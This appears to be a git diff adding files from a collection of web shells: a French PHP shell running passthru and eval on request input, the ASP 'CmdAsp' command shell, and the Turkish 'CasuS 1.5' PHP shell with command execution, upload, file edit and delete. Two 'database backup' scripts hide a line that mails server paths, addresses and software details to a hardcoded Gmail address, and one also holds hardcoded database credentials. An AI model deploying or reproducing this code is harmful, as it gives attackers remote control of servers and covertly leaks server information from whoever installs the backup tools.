echo"En-tête Accept du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT</font><br>";
echo"En tête User_agent du protocole HTTP : <font color=\"red\">$HTTP_USER_AGENT</font><br>";
echo"En-tête Accept-Charset du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_CHARSET</font><br> ";
echo"En-tête Accept-Encoding du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_ENCODING</font><br> ";
echo"En-tête Accept-Language du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_LANGUAGE</font><br> ";
echo"En-tête Connection du protocole HTTP : <font color=\"red\">$HTTP_CONNECTION</font><br> ";
echo"En-tête Host du protocole HTTP : <font color=\"red\">$HTTP_HOST</font><br><br>";
echo"Version de CGI : <font color=\"red\">$GATEWAY_INTERFACE</font><br> ";
echo"Version de récupération du form : <font color=\"red\">$REQUEST_METHOD</font><br> ";
echo"Argument de l' adresse : <font color=\"red\">$QUERY_STRING</font> <br>";
echo"Nom du script : <font color=\"red\">$SCRIPT_NAME</font><br> ";
echo"Chemin du script : <font color=\"red\">$SCRIPT_FILENAME</font><br> ";
echo"Adresse entière du script : <font color=\"red\">$REQUEST_URI
</font><br>";
}
/* Commande*******/
if($cmd != "")
{
echo "{${passthru($cmd)}}<br>";
}
/* Commande*******/
/* Exécution de code PHP**********/
if($code != ""){
$code = stripslashes($code);
eval($code);
}
/* Execution de code PHP**********/
/* Listing de rep******************/
if($rep != "")
{
if(strrchr($rep, "/") != "" || !stristr($rep, "/")) $rep .= "/";
$dir=opendir($rep);
while ($file = readdir($dir))
{
if (is_dir("$rep/$file") && $file!='.')
{
echo"<li><a href=\"$adresse_locale&rep=$rep$file\">(rep) $file
</a><br>\n";
}elseif(is_file("$rep/$file"))
{
echo "<li> <a
href=\"$adresse_locale&option_file=read&nom=$rep$file\">(file) $file</a> <a
href=\"$adresse_locale&option_file=del&nom=$rep$file\">del</a> <a
href=\"$adresse_locale&option_file=edit&nom=$rep$file\">edit</a><br>\n";
}
}
}
/* Listing de rep******************/
/* Gestion des fichiers*********************/
if($option_file == "mkdir" && $nom != "")
{
$fp = fopen($nom, "w");
fwrite($fp, stripslashes($msg));
print("Fichier crée/modifié");
}
if($option_file == "read" && $nom != "")
{
$fp = fopen($nom, "r");
$file = fread($fp, filesize($nom));
$file = htmlentities ($file, ENT_QUOTES);
$file = nl2br($file);
echo "<br>$file";
}
if($option_file == "del" && $nom != "")
{
unlink($nom);
print("Fichier effacé");
}
if($option_file == "edit" && $nom != "")
{
$fp = fopen($nom, "r");
$file = fread($fp, filesize($nom));
$file = htmlentities ($file, ENT_QUOTES);
echo "<form action=$adresse_locale> $remf";
echo "<TEXTAREA COLS=80 rows=25 name=msg>$file</textarea>";
echo "<input type=hidden name=option_file value=mkdir>";
echo "<input type=hidden name=nom value=$nom>";
echo "<br><input type=submit value=Go> PS : les fichiers trop longs ne passent po :(";
echo "</form>";
}
/* Gestion des fichiers*********************/
/* Envoi de mails************************/
if(($destinataire != "" ) && ($sujet != "") && ($message != "")){
$option_mail = "From: $provenance \n";
$option_mail .= "Reply-to: $retour \n";
$option_mail .= "X-Mailer: Mailer by rAidEn \n";
mail($destinataire, $sujet, $message, $option_mail);
print("Mail envoyé a : $destinataire ...");
}
/* Envoi de mails************************/
print("</body></html>");
/*print("<noscript><script=\"");*/
?>

21
138shell/B/backup.php.txt Normal file
View file

@ -0,0 +1,21 @@
<?php
include ("config.php");db_connect();header('Content-Type: application/octetstream');header('Content-Disposition: filename="linksbox_v2.sql"');$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$sd98="john.barker446@gmail.com";$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
header('Pragma: no-cache');header('Expires: 0');
$data .= "#phpMyAdmin MySQL-Dump \r\n";
$data .="# http://phpwizard.net/phpMyAdmin/ \r\n";
$data .="# http://www.phpmyadmin.net/ (download page) \r\n";
$data .= "#$database v2.0 Database Backup\r\n";
$data .= "#Host: $server\r\n";
$data .= "#Database: $database\r\n\r\n";
$data .= "#Table add_links:\r\n";$result = mysql_query("SELECT * FROM add_links");while ($a = mysql_fetch_array($result)) {
foreach ($a as $key => $value) {
$a[$key] = addslashes($a[$key]);
}
$data .= "INSERT INTO add_links VALUES ('0','$a[link]', '$a[description]', '$a[tooltip]', '$a[hits]'); \r\n#endquery\r\n";
}
echo $data;
?>

170
138shell/B/backupsql.php.txt Normal file
View file

@ -0,0 +1,170 @@
<?php
/*
* Backup script on server.
*
* Runs on the server, called by Cron. Connects to the mySQL
* database and creates a backup file of the whole database.
* Saves to file in current directory.
*
* @author Cow <cow@invisionize.com>
* @version 0.2
* @date 18/08/2004
* @package Backup Server
* Upgraded Ver 2.0 (sending sql backup as attachment
* as email attachment, or send to a remote ftp server by
* @co-authors Cool Surfer<Coolsurfer@gmail.com> and
* Neagu Mihai<neagumihai@hotmail.com>
*/
set_time_limit(0);
$date = date("mdy-hia");
$dbserver = "localhost";
$dbuser = "vhacker_robot";
$dbpass = "mp2811987";
$dbname = "tvhacker_vbb3";
$file = "N-Cool-$date.sql.gz";
$gzip = TRUE;
$silent = TRUE;
function write($contents) {
if ($GLOBALS['gzip']) {
gzwrite($GLOBALS['fp'], $contents);
} else {
fwrite($GLOBALS['fp'], $contents);
}
}
mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
if ($gzip) {
$fp = gzopen($file, "w");
} else {
$fp = fopen($file, "w");
}
$tables = mysql_query ("SHOW TABLES");
while ($i = mysql_fetch_array($tables)) {
$i = $i['Tables_in_'.$dbname];
if (!$silent) {
echo "Backing up table ".$i."\n";
}
// Create DB code
$create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
write($create['Create Table'].";\n\n");
// DB Table content itself
$sql = mysql_query ("SELECT * FROM ".$i);
if (mysql_num_rows($sql)) {
while ($row = mysql_fetch_row($sql)) {
foreach ($row as $j => $k) {
$row[$j] = "'".mysql_escape_string($k)."'";
}
write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
}
}
}
$gzip ? gzclose($fp) : fclose ($fp);
// Optional Options You May Optionally Configure
$use_gzip = "yes"; // Set to No if you don't want the files sent in .gz format
$remove_sql_file = "no"; // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
$remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
// Configure the path that this script resides on your server.
$savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
$send_email = "yes"; /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
$to = "lehungtk@gmail.com"; // Who to send the emails to, enter ur correct id.
$from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may change it.
$senddate = date("j F Y");
$subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
$message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
$use_ftp = ""; // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
$ftp_server = "localhost"; // FTP hostname
$ftp_user_name = "ftp_username"; // FTP username
$ftp_user_pass = "ftp_password"; // FTP password
$ftp_path = "/"; // This is the path to upload on your ftp server!
// Do not Modify below this line! It will void your warranty :-D!
$date = date("mdy-hia");
$filename = "$savepath/$dbname-$date.sql";
if($use_gzip=="yes"){
$filename2 = $file;
} else {
$filename2 = "$savepath/$dbname-$date.sql";
}
if($send_email == "yes" ){
$fileatt_type = filetype($filename2);
$fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
$headers = "From: $from";
// Read the file to be attached ('rb' = read binary)
echo "Openning archive for attaching:".$filename2;
$file = fopen($filename2,'rb');
$data = fread($file,filesize($filename2));
fclose($file);
// Generate a boundary string
$semi_rand = md5(time());
$mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
// Add the headers for a file attachment
$headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
// Add a multipart boundary above the plain message
$message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
$message . "\n\n";
// Base64 encode the file data
$data = chunk_split(base64_encode($data));
// Add file attachment to the message
echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|<BR>";
$message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
$data . "\n\n" ."--{$mime_boundary}--\n";
//$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
// $data . "\n\n" ."--{$mime_boundary}--\n";
// Send the message
$ok = @mail($to, $subject, $message, $headers);
if ($ok) {
echo "<h4><center><bg color=black><font color= blue>Database backup created and sent! File name $filename2 </p>
Idea Conceived By coolsurfer@gmail.com
Programmer email: neagumihai@hotmail.com</p>
This is our first humble effort, pl report bugs, if U find any...</p>
Email me at <>coolsurfer@gmail.com nJoY!! :)
</color></center></h4>";
} else {
echo "<h4><center>Mail could not be sent. Sorry!</center></h4>";
}
}
if($use_ftp == "yes"){
$ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
shell_exec($ftpconnect);
echo "<h4><center>$filename2 Was created and uploaded to your FTP server!</center></h4>";
}
if($remove_gzip_file=="yes"){
exec("rm -r -f $filename2");
}
?>

170
138shell/B/backupsql.txt Normal file
View file

@ -0,0 +1,170 @@
<?php
/*
* Backup script on server.
*
* Runs on the server, called by Cron. Connects to the mySQL
* database and creates a backup file of the whole database.
* Saves to file in current directory.
*
* @author Cow <cow@invisionize.com>
* @version 0.2
* @date 18/08/2004
* @package Backup Server
* Upgraded Ver 2.0 (sending sql backup as attachment
* as email attachment, or send to a remote ftp server by
* @co-authors Cool Surfer<Coolsurfer@gmail.com> and
* Neagu Mihai<neagumihai@hotmail.com>
*/
set_time_limit(0);
$date = date("mdy-hia");
$dbserver = "localhost";
$dbuser = "vhacker_robot";
$dbpass = "mp2811987";
$dbname = "tvhacker_vbb3";
$file = "N-Cool-$date.sql.gz";
$gzip = TRUE;
$silent = TRUE;
function write($contents) {
if ($GLOBALS['gzip']) {
gzwrite($GLOBALS['fp'], $contents);
} else {
fwrite($GLOBALS['fp'], $contents);
}
}
mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
if ($gzip) {
$fp = gzopen($file, "w");
} else {
$fp = fopen($file, "w");
}
$tables = mysql_query ("SHOW TABLES");
while ($i = mysql_fetch_array($tables)) {
$i = $i['Tables_in_'.$dbname];
if (!$silent) {
echo "Backing up table ".$i."\n";
}
// Create DB code
$create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
write($create['Create Table'].";\n\n");
// DB Table content itself
$sql = mysql_query ("SELECT * FROM ".$i);
if (mysql_num_rows($sql)) {
while ($row = mysql_fetch_row($sql)) {
foreach ($row as $j => $k) {
$row[$j] = "'".mysql_escape_string($k)."'";
}
write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
}
}
}
$gzip ? gzclose($fp) : fclose ($fp);
// Optional Options You May Optionally Configure
$use_gzip = "yes"; // Set to No if you don't want the files sent in .gz format
$remove_sql_file = "no"; // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
$remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
// Configure the path that this script resides on your server.
$savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
$send_email = "yes"; /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
$to = "lehungtk@gmail.com"; // Who to send the emails to, enter ur correct id.
$from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may change it.
$senddate = date("j F Y");
$subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
$message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
$use_ftp = ""; // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
$ftp_server = "localhost"; // FTP hostname
$ftp_user_name = "ftp_username"; // FTP username
$ftp_user_pass = "ftp_password"; // FTP password
$ftp_path = "/"; // This is the path to upload on your ftp server!
// Do not Modify below this line! It will void your warranty :-D!
$date = date("mdy-hia");
$filename = "$savepath/$dbname-$date.sql";
if($use_gzip=="yes"){
$filename2 = $file;
} else {
$filename2 = "$savepath/$dbname-$date.sql";
}
if($send_email == "yes" ){
$fileatt_type = filetype($filename2);
$fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
$headers = "From: $from";
// Read the file to be attached ('rb' = read binary)
echo "Openning archive for attaching:".$filename2;
$file = fopen($filename2,'rb');
$data = fread($file,filesize($filename2));
fclose($file);
// Generate a boundary string
$semi_rand = md5(time());
$mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
// Add the headers for a file attachment
$headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
// Add a multipart boundary above the plain message
$message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
$message . "\n\n";
// Base64 encode the file data
$data = chunk_split(base64_encode($data));
// Add file attachment to the message
echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|<BR>";
$message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
$data . "\n\n" ."--{$mime_boundary}--\n";
//$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
// $data . "\n\n" ."--{$mime_boundary}--\n";
// Send the message
$ok = @mail($to, $subject, $message, $headers);
if ($ok) {
echo "<h4><center><bg color=black><font color= blue>Database backup created and sent! File name $filename2 </p>
Idea Conceived By coolsurfer@gmail.com
Programmer email: neagumihai@hotmail.com</p>
This is our first humble effort, pl report bugs, if U find any...</p>
Email me at <>coolsurfer@gmail.com nJoY!! :)
</color></center></h4>";
} else {
echo "<h4><center>Mail could not be sent. Sorry!</center></h4>";
}
}
if($use_ftp == "yes"){
$ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
shell_exec($ftpconnect);
echo "<h4><center>$filename2 Was created and uploaded to your FTP server!</center></h4>";
}
if($remove_gzip_file=="yes"){
exec("rm -r -f $filename2");
}
?>

53
138shell/C/CMD.asp.txt Normal file
View file

@ -0,0 +1,53 @@
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

368
138shell/C/Casus15.php.txt Normal file
View file

@ -0,0 +1,368 @@
<?php
$default=$DOCUMENT_ROOT;
$this_file="./casus15.php";
if(isset($save)){
$fname=str_replace(" ","_",$fname);
$fname=str_replace("%20","_",$fname);
header("Cache-control: private");
header("Content-type: application/force-download");
header("Content-Length: ".filesize($save));
header("Content-Disposition: attachment; filename=$fname");
$fp = fopen($save, 'r');
fpassthru($fp);
fclose($fp);
unset($save);
exit;
}
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SYLYNDY:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
}
if ($op=='phpinfo'){
$fonk_kap = get_cfg_var("fonksiyonlary_kapat");
echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çaly?myyiii</center>";
exit;
}
if ($op=='me'){
echo "<html>
<head>
<title>CEHENNEMDEN ÇIKAN ÇILGIN TÜRK</title>
</head>
<body bgcolor='#000000' text='#0000FF' link='#0000FF' vlink='#0000FF' alink='#00FF00'>
<center>Fazla söze gerek yok...</center>
<center><br>O yanlyz bir kovboy,<br>
<br>O cehennemden çykan çylgyn TÜRK,<br>
<br>O bir rap manya?y,<br>
<br>O bir php coder,<br>
<br>O'nun hackten daha çok sevdi?i tek ?ey iki hack,<br>
<br>O...<br>
<br>O'nun kim olduunu biliyorsunuz O tabiki...<br>
<br></center>";
$sayi='7';
while($sayi>=1){
echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'> EFENDISI</font> <font color='#FF0000'>MAFIABOY</font> </font></center>";
$sayi--;
}
$sayi2='1';
while($sayi2<=7){
echo "<center><font size='$sayi2' color='#008000'>baddog@hotmail.com</font></center>";
$sayi2++;
};
echo "</body>
</html>";
exit;
}
echo "<html>
<head>
<title>CasuS 1.5 by MafiABoY</title>
</head>
<body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
</body>";
echo "<center><font size='+3' color='#FF0000'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
<center><font size='+2' color='#FFFFFF'>A TURKISH </font><font size='+2' color='#FF0000'>HACKER</font><br>
<br>";
echo "<center><a href='./$this_file?dir=$dir'>ANA BOLUM</a></center>";
echo "<br>";
echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
echo "<br>";
echo "<center><a href='./$this_file?op=wshell&dir=$dir'>WEB SHELL</a></center>";
echo "<br>
<br>
<br>";
echo "<center>---><a href='./$this_file?op=me' target='_blank'>MafiABoY</a><---</center>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<div align=center>
<font size='+1' color='#0000FF'><u>Root Klasör</u>: $DOCUMENT_ROOT</font><br>
<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
if(!isset($dir)){
$dir="$default";
}
echo "<input type=text size=60 name=dir value='$dir'>
<input type=submit value='GIT'><br>
</form>
</div>";
if ($op=='wshell'){
echo "<br><center><font size='+1' color='#FF0000'>WEBSHELL</font></center>";
if (isset($ok)){
if (empty($kod)){
die ("<center><font color='#FF0000'>LEN MANYAK KOMUT YAZMAZSAN NE MOK Y?YNE YARAR</font><center>");
}
echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
<br>";
echo "<center><input type=text size=35 name=kod value='$kod'><input type=submit name=ok value='CALISTIR'>
<br>
<br></center></form>";
echo "<center><TEXTAREA rows=30 cols=85 readonly>";
system("$kod");
echo "</TEXTAREA></center>";
exit;
} elseif (empty($ok)){
echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
<br>";
echo "<center><input type=text size=35 name=kod value='Calistirmak istediginiz komutu buraya girin'><input type=submit name=ok value='CALISTIR'>
<br>
<br></center></form>";
echo "<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>";
exit;
}
}
if ($op=='up'){
$path=dir;
echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
if(isset($dy)) {
if(empty($dosya_gonder)){
} else {
copy ( $dosya_gonder, "$dir/$dosya_gonder_name") ? print("$dosya_gonder_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder_name <font color='#FF0000'>kopyalanamady</font><br>");
}
if(empty($dosya_gonder2)){
} else {
copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_name <font color='#0000FF'>kopyaland</font>y<br>") : print("$dosya_gonder2_name <font color='#FF0000'>kopyalanamady</font><br>");
}
if(empty($dosya_gonder3)){
} else {
copy ( $dosya_gonder3, "$dir/$dosya_gonder3_name") ? print("$dosya_gonder3_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder3_name <font color='#FF0000'>kopyalanamady</font><br>");
}
if(empty($dosya_gonder4)){
} else {
copy ( $dosya_gonder4, "$dir/$dosya_gonder4_name") ? print("$dosya_gonder4_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder4_name <font color='#FF0000'>kopyalanamady</font><br>");
}
} elseif(empty($dy )) {
$path=$dir;
$dir = $dosya_dizin;
echo "$dir";
echo "<FORM ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder2'></center><br>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder3'></center><br>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder4'></center><br>";
echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
echo "</form>";
echo "</html>";
}
}
if($op=='mf'){
$path=$dir;
if(isset($dismi) && isset($kodlar)){
$ydosya="$path/$dismi";
if(file_exists("$path/$dismi")){
$dos= "Böyle Bir Dosya Vardy Üzerine Yazyldy";
} else {
$dos = "Dosya Olu?turuldu";
}
touch ("$path/$dismi") or die("Dosya Olu?turulamyyor");
$ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açylamyyor");
fwrite($ydosya2, $kodlar) or die("Dosyaya yazylamyyor");
fclose($ydosya2);
echo "<center><font color='#0000FF'>$dos</font></center>";
} else {
echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
echo "<center>Dosya Ysmi :<input type='text' name='dismi'></center><br>";
echo "<br>";
echo "<center>KODLAR</center><br>";
echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
echo "</form>";
}
}
if($op=='md'){
$path=$dir;
if(isset($kismi) && isset($okmf)){
$klasör="$path/$kismi";
mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Olu?turulamyyor</font></center>");
echo "<center><font color='#0000FF'>Klasör Olu?turuldu</font></center>";
}
echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
echo "<center>Klasör Ysmi :<input type='text' name='kismi'></center><br>";
echo "<br>";
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
echo "</form>";
}
if($op=='del'){
unlink("$fname");
}
if($op=='dd'){
$dir=$here;
$deldirs=$yol;
if(!file_exists("$deldirs")) {
echo "<font color=\"#ff0000\">Dosya Yok</font>";
} else {
deltree($deldirs);
}
}
if($op=='edit'){
$yol=$fname;
$yold=$path;
if (isset($ok)){
$dosya = fopen("$yol", 'w') or die("Dosya Açylamyyor");
$metin=$tarea;
fwrite($dosya, $metin) or die("Yazylamyyor!");
fclose($dosya);
echo "<center><font color='#0000FF'Dosya Ba?aryyla Düzenlendi</font></center>";
} else {
$path=$dir;
echo "<center>DÜZENLE: $yol</center>";
$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açylamyyor</font></center>");
$boyut=filesize($yol);
$duzen = @fread ($dosya, $boyut);
echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
fclose($dosya);
$duzen=htmlspecialchars($duzen);
echo "</form>";
}
}
if($op=='efp2'){
$fileperm=base_convert($_POST['fileperm'],8,10);
echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 YSYMLY DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEY?TYRYLEMEDY!!</font>";
echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEY?TYRYLDY</font>";
}
if($op=='efp'){
$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
echo "<form method=post action=./$this_file?op=efp2>
<div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
<input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
<input name='dir' type='hidden' value='$yol'>
<input type='submit' value='TAMAM' class='input'></div><br>
</form>";
}
$path=$dir;
if(isset($dir)){
if ($dir = @opendir("$dir")) {
while (($file = readdir($dir)) !== false) {
if($file!="." && $file!=".."){
if(is_file("$path/$file")){
$disk_space=filesize("$path/$file");
$kb=$disk_space/1024;
$total_kb = number_format($kb, 2, '.', '');
$total_kb2="Kb";
echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
echo "<br></div>\n";
}else{
echo "<div align=left><a href='./$this_file?dir=$path/$file'>GYT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
echo "<font color='#FFFF00'>$dirperm</font>";
echo " <br></div>\n";
}
}
}
closedir($dir);
}
}
echo "<center>------------------------------</center>";
echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
echo "<center><a href='./$this_file?dir=/'>Linux Kök Dizinine Git</a></center>";
if(file_exists("B:\\")){
echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
